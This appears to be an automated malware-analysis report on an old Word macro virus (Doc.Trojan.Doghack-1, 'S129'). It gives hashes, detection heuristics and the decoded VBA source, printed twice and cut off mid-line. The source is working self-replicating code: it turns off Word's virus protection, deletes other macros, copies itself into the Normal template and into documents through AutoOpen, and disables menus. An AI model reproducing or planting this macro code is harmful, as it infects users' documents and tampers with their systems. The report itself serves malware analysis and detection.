Office (OLE) malware analysis — malicious · e52261cbbe1354b3

MALICIOUS

Office (OLE)

35.0 KB Created: 2000-01-17 20:30:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 4297fd5d20cd182d4b91dec92778da83 SHA-1: a6221dda4de5fc5e8c171a5939780db63ca3ceee SHA-256: e52261cbbe1354b3d596157fb109549e29f7dcbed05116c3f582c66a3fac07cf

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a malicious Office document containing a VBA macro. The macro is designed to infect the Normal template by copying itself, and it also attempts to remove other macros from the Normal template. The presence of the 'AutoOpen' macro and the 'OLE_VBA_MACROS' heuristic indicate malicious intent. The script's authoring comments suggest it is a macro virus.

Heuristics 4

ClamAV: Doc.Trojan.Doghack-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Doghack-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5867 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5867 bytes
SHA-256: `ea28d229f83d5e64de5c6d09443a1dfffb2cd1f4a0837392294a81ca57f84553`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "S129" ' Assalamu'alaikum Wr. Wb....... ' Surabaya, Rabu, 22 Juli 1998 ' Virus Macro program by S129 Good DocHacker ' ------------------------- Indonesia ------ ' Mohon ma'af bila telah mengganggu Anda. ' Program ini tidak merusak sistem atau file anda. ' Isi virus ini hanya sekedar informasi omong kosong belaka.... ' ------------------------- Suroboyo-an ----- ' Sepurane lek iki wis ngganggu sampeyan ' Program iki gak ngrusak sistem utawa file sampeyan ' Isine virus iki mek sekedar informasi nggacor thok..... ' ------------------------------------------- Public NormInfected As Boolean Public DocInfected As Boolean Public wisGanti As Boolean Public docSave As Boolean Sub Dok2Nor() Options.VirusProtection = False idx = 0 On Error GoTo Erw1 NormInfected = False Set AD = ActiveDocument Set NT = NormalTemplate On Error GoTo Erh1a jumM = NT.VBProject.VBComponents.Count If jumM > 1 Then For i = 1 To jumM NMacr = NT.VBProject.VBComponents(1 + idx).Name If NMacr = "S129" Then NormInfected = True If (NMacr <> "S129") And (NMacr <> "S129Form") And (NMacr <> "ThisDocument") Then Application.OrganizerDelete Source:=NT.FullName, Name:=NMacr, _ Object:=wdOrganizerObjectProjectItems Else idx = idx + 1 End If Next i End If Erh1a: If NormInfected = False Then On Error GoTo Erh1 Application.OrganizerCopy Source:=AD.FullName, _ Destination:=NT.FullName, Name:= _ "S129", Object:=wdOrganizerObjectProjectItems Application.OrganizerCopy Source:=AD.FullName, _ Destination:=NT.FullName, Name:= _ "S129Form", Object:=wdOrganizerObjectProjectItems Templates(NT.FullName).Save Erh1: End If Erw1: End Sub Sub Nor2Dok() On Error GoTo Erw2 DocInfected = False docSave = False idx = 0 Set AD = ActiveDocument Set NT = NormalTemplate On Error GoTo Erh2a jumM = AD.VBProject.VBComponents.Count If jumM > 1 Then For i = 1 To jumM NMacr = AD.VBProject.VBComponents(1 + idx).Name If NMacr = "S129" Then DocInfected = True If (NMacr <> "S129") And (NMacr <> "S129Form") _ And (NMacr <> "ThisDocument") Then 'And (nmacr <> "Reference to Normal") Then Application.OrganizerDelete Source:=AD.FullName, Name:=NMacr, _ Object:=wdOrganizerObjectProjectItems Else idx = idx + 1 End If Next i End If Erh2a: If DocInfected = False Then On Error GoTo Erh2 Application.OrganizerCopy Source:=NT.FullName, _ Destination:=AD.FullName, Name:= _ "S129", Object:=wdOrganizerObjectProjectItems Application.OrganizerCopy Source:=NT.FullName, _ Destination:=AD.FullName, Name:= _ "S129Form", Object:=wdOrganizerObjectProjectItems docSave = True Erh2: End If Erw2: End Sub Sub AutoOpen() wisGanti = False NormInfected = False WordBasic.DisableAutoMacros 0 On Error Resume Next If (wisGanti = False) And (NormInfected = False) Then CommandBars("Help").Controls("About Microsoft Word").Caption = ("Assalamu'alaikum Wr. Wb.....") CommandBars("Tools").Controls("Macro").Visible = True CommandBars("Tools").Controls("Macro").Enabled = False CommandBars("Tools").Controls("Templates and Add-ins...").Enabled = False CommandBars("Tools").Controls("Macro").Caption = ("Makmu, Cok.....!!!!") CommandBars("Tools").Controls("Templates and Add-ins...").Caption = ("Tempe dan Tahu Enak...!!!") End If wisGanti = True Call Dok2Nor WordBasic.DisableAutoMacros 1 End Sub Sub FileOpen() WordBasic.DisableAutoMacros 1 Dialogs(wdDialogFileO ... (truncated)

SHA-256: ea28d229f83d5e64de5c6d09443a1dfffb2cd1f4a0837392294a81ca57f84553

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "S129"
' Assalamu'alaikum Wr. Wb.......
' Surabaya, Rabu, 22 Juli 1998
' Virus Macro program by S129 Good DocHacker
' ------------------------- Indonesia ------
' Mohon ma'af bila telah mengganggu Anda.
' Program ini tidak merusak sistem atau file anda.
' Isi virus ini hanya sekedar informasi omong kosong belaka....
' ------------------------- Suroboyo-an -----
' Sepurane lek iki wis ngganggu sampeyan
' Program iki gak ngrusak sistem utawa file sampeyan
' Isine virus iki mek sekedar informasi nggacor thok.....
' -------------------------------------------
Public NormInfected As Boolean
Public DocInfected As Boolean
Public wisGanti As Boolean
Public docSave As Boolean
Sub Dok2Nor()
    Options.VirusProtection = False
    idx = 0
    On Error GoTo Erw1
    NormInfected = False
    Set AD = ActiveDocument
    Set NT = NormalTemplate
    On Error GoTo Erh1a
    jumM = NT.VBProject.VBComponents.Count
    If jumM > 1 Then
    For i = 1 To jumM
      NMacr = NT.VBProject.VBComponents(1 + idx).Name
      If NMacr = "S129" Then NormInfected = True
      If (NMacr <> "S129") And (NMacr <> "S129Form") And (NMacr <> "ThisDocument") Then
        Application.OrganizerDelete Source:=NT.FullName, Name:=NMacr, _
        Object:=wdOrganizerObjectProjectItems
      Else
        idx = idx + 1
      End If
    Next i
    End If
Erh1a:
    If NormInfected = False Then
      On Error GoTo Erh1
      Application.OrganizerCopy Source:=AD.FullName, _
          Destination:=NT.FullName, Name:= _
          "S129", Object:=wdOrganizerObjectProjectItems
      Application.OrganizerCopy Source:=AD.FullName, _
          Destination:=NT.FullName, Name:= _
          "S129Form", Object:=wdOrganizerObjectProjectItems
      Templates(NT.FullName).Save
Erh1:
    End If
Erw1:
End Sub
Sub Nor2Dok()
    On Error GoTo Erw2
    DocInfected = False
    docSave = False
    idx = 0
    Set AD = ActiveDocument
    Set NT = NormalTemplate
    On Error GoTo Erh2a
    jumM = AD.VBProject.VBComponents.Count
    If jumM > 1 Then
    For i = 1 To jumM
      NMacr = AD.VBProject.VBComponents(1 + idx).Name
      If NMacr = "S129" Then DocInfected = True
      If (NMacr <> "S129") And (NMacr <> "S129Form") _
      And (NMacr <> "ThisDocument") Then 'And (nmacr <> "Reference to Normal") Then
        Application.OrganizerDelete Source:=AD.FullName, Name:=NMacr, _
        Object:=wdOrganizerObjectProjectItems
      Else
        idx = idx + 1
      End If
    Next i
    End If
Erh2a:
    If DocInfected = False Then
      On Error GoTo Erh2
      Application.OrganizerCopy Source:=NT.FullName, _
          Destination:=AD.FullName, Name:= _
          "S129", Object:=wdOrganizerObjectProjectItems
      Application.OrganizerCopy Source:=NT.FullName, _
          Destination:=AD.FullName, Name:= _
          "S129Form", Object:=wdOrganizerObjectProjectItems
      docSave = True
Erh2:
    End If
Erw2:
End Sub
Sub AutoOpen()
    wisGanti = False
    NormInfected = False
    WordBasic.DisableAutoMacros 0
    On Error Resume Next
    If (wisGanti = False) And (NormInfected = False) Then
      CommandBars("Help").Controls("About Microsoft Word").Caption = ("Assalamu'alaikum Wr. Wb.....")
      CommandBars("Tools").Controls("Macro").Visible = True
      CommandBars("Tools").Controls("Macro").Enabled = False
      CommandBars("Tools").Controls("Templates and Add-ins...").Enabled = False
      CommandBars("Tools").Controls("Macro").Caption = ("Makmu, Cok.....!!!!")
      CommandBars("Tools").Controls("Templates and Add-ins...").Caption = ("Tempe dan Tahu Enak...!!!")
    End If
    wisGanti = True
    Call Dok2Nor
    WordBasic.DisableAutoMacros 1
End Sub
Sub FileOpen()
    WordBasic.DisableAutoMacros 1
    Dialogs(wdDialogFileO
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.